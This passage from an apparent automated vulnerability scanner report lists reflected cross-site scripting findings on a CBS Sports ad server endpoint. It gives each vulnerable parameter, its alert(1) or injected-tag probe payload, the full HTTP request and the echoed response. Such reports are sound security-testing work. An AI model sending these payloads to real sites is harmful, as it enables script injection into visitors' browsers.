/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1e5ea6<a>be9fa511e02&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='156951102' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw10.cnet.com::171122105
...[SNIP]...

3.576. http://mads.cbssports.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 710da'%3balert(1)//8ebbbd4a399 was submitted in the BRAND parameter. This input was echoed as 710da';alert(1)//8ebbbd4a399 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59710da'%3balert(1)//8ebbbd4a399&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:03 GMT
Server: Apache/2.2
Content-Length: 1670
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:03 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59710da'%3balert(1)//8ebbbd4a399&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=17107&sg=1815&o=22052%253a22135%253a&h=cn&p=2&b=59710da';alert(1)//8ebbbd4a399&l=en_US&site=175&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e28:4DB88A6216535&orh=cbssports.com&ort=&oepartner=&epartner=&ppartner=&pdo
...[SNIP]...

3.577. http://mads.cbssports.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload e26c6*/alert(1)//286aa8e3fbf was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59e26c6*/alert(1)//286aa8e3fbf&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:05 GMT
Server: Apache/2.2
Content-Length: 1668
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59e26c6*/alert(1)//286aa8e3fbf&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADR
...[SNIP]...

3.578. http://mads.cbssports.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 6932b<script>alert(1)</script>c3008f673bb was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph&PAGESTATE=&SITE=175&BRAND=596932b<script>alert(1)</script>c3008f673bb&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:00:04 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:00:04 GMT
Content-Length: 17163

/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiad234_100",segmentId:"504465",rotatorId:"15989",creativeSizeId:"207",isBlank:"0",seg_pageState:"2312;BC2312-51",adHTML:"<div id=\"madison_ad_2
...[SNIP]...
<a href=\"http://adlog.com.com/adlog/c/r=15989&sg=504465&o=22058%253a22207%253a&h=cn&p=2&b=596932b<script>alert(1)</script>c3008f673bb&l=en_US&site=175&pt=2001&nd=22207&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e3:4DB7B0066AF2B&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.
...[SNIP]...

3.579. http://mads.cbssports.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 1df8c<a>f9102c13f80 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=591df8c<a>f9102c13f80&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:01:45 GMT
Server: Apache/2.2
Content-Length: 590
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:01:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=591df8c<a>f9102c13f80&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=44551744&ADREQ&beacon=1&cookie
...[SNIP]...

3.580. http://mads.cbssports.com/mac-ad [CELT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 56718<a>2ed59e30b6d was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph56718<a>2ed59e30b6d&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=35742613&ADREQ&SP=234&POS=100&WIDTH=970&HEIGHT=0&cookiesOn=1&divId=cbsiad234_100&ADREQ&SP=110&POS=100&cookiesOn=1&divId=cbsiad110_100&ADREQ&SP=16&POS=100&WIDTH=300&HEIGHT=260&cookiesOn=1&divId=cbsiad16_100&ADREQ&SP=119&POS=100&cookiesOn=1&divId=cbsiad119_100 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:58:18 GMT
Server: Apache/2.2
Content-Length: 3307
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 21:58:18 GMT

<!-- NO AD TEXT: _QUERY_STRING="META&ADSEPARATOR=%3B&GLOBAL&REQID=1&CLIENT:ID=SJS&CELT=jph56718<a>2ed59e30b6d&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf&DVAR_USER=anon&has_takeover=0&DVAR_INS
...[SNIP]...

3.581. http://mads.cbssports.com/mac-ad [COOKIE%3AANON_ID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the COOKIE%3AANON_ID request parameter is copied into the HTML document as plain text between tags. The payload b5e9e<a>87d906fdcfc was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=Tbij-wq0GW4AAGTpQ08&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDsb5e9e<a>87d906fdcfc&x-cb=46178629&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; mad_rsi_segs=; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; fsr.a=1303946249127; surround=f|1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:23:52 GMT
Server: Apache/2.2
Content-Length: 625
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:23:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=Tbij-wq0GW4AAGTpQ08&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDsb5e9e<a>87d906fdcfc&x-cb=46178629&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072:22408:' CID='' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13
...[SNIP]...

3.582. http://mads.cbssports.com/mac-ad [COOKIE%3AANON_ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the COOKIE%3AANON_ID request parameter is copied into a JavaScript inline comment. The payload 97371*/alert(1)//778b358c206 was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs97371*/alert(1)//778b358c206&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:25 GMT
Server: Apache/2.2
Content-Length: 1642
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:41:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs97371*/alert(1)//778b358c206&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.583. http://mads.cbssports.com/mac-ad [DVAR_EXCLUDE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_EXCLUDE request parameter is copied into the HTML document as plain text between tags. The payload 2471a<a>43259e6a460 was submitted in the DVAR_EXCLUDE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf2471a<a>43259e6a460&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=28623258&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/golf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:07:12 GMT
Server: Apache/2.2
Content-Length: 608
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:07:12 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22058%3A22207%3A&NODE=22207&PTYPE=2001&PGUID=TbiQ3wq0GVcAACnZCmE&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_EXCLUDE=golf2471a<a>43259e6a460&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US&x-cb=28623258&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22058:22207:' CID
...[SNIP]...

3.584. http://mads.cbssports.com/mac-ad [DVAR_INSTLANG parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 2c33c<a>ad227f20616 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US2c33c<a>ad227f20616&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; last_access=1303941343; sjxBeta=sysOn; surround=c|4; fsr.a=1303941356930; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:08:14 GMT
Server: Apache/2.2
Content-Length: 589
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:08:14 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22072%3A22408%3A&NODE=22408&PTYPE=2001&PGUID=TbiQ3wq0Ht4AAD5KFuA&DVAR_SESSION=c&DVAR_SUBSESSION=4&cookiesOn=1&DVAR_USER=anon&has_takeover=0&DVAR_INSTLANG=en-US2c33c<a>ad227f20616&x-cb=44551744&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='175' PTYPE='2001' NCAT='22072:22408:' CID='' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13
...[SNIP]...

3.585. http://mads.cbssports.com/mac-ad [DVAR_INSTLANG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload f3134*/alert(1)//9167df0ff44 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-USf3134*/alert(1)//9167df0ff44&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}; last_access=1303947378; fsr.a=1303947389291

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:22 GMT
Server: Apache/2.2
Content-Length: 1682
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:41:22 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=175&BRAND=59&NCAT=22052%3A22135%3A&NODE=1&PTYPE=2000&PGUID=Tbiocgq0GW4AAEQFAnQ&DVAR_SESSION=f&DVAR_SUBSESSION=1&cookiesOn=1&DVAR_USER=anon&DVAR_INSTLANG=en-USf3134*/alert(1)//9167df0ff44&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=67040581&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.586. http://mads.cbssports.com/mac-ad [DVAR_SESSION parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbssports.com
Path:	/mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 47437<a>8fd2c6902b1 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

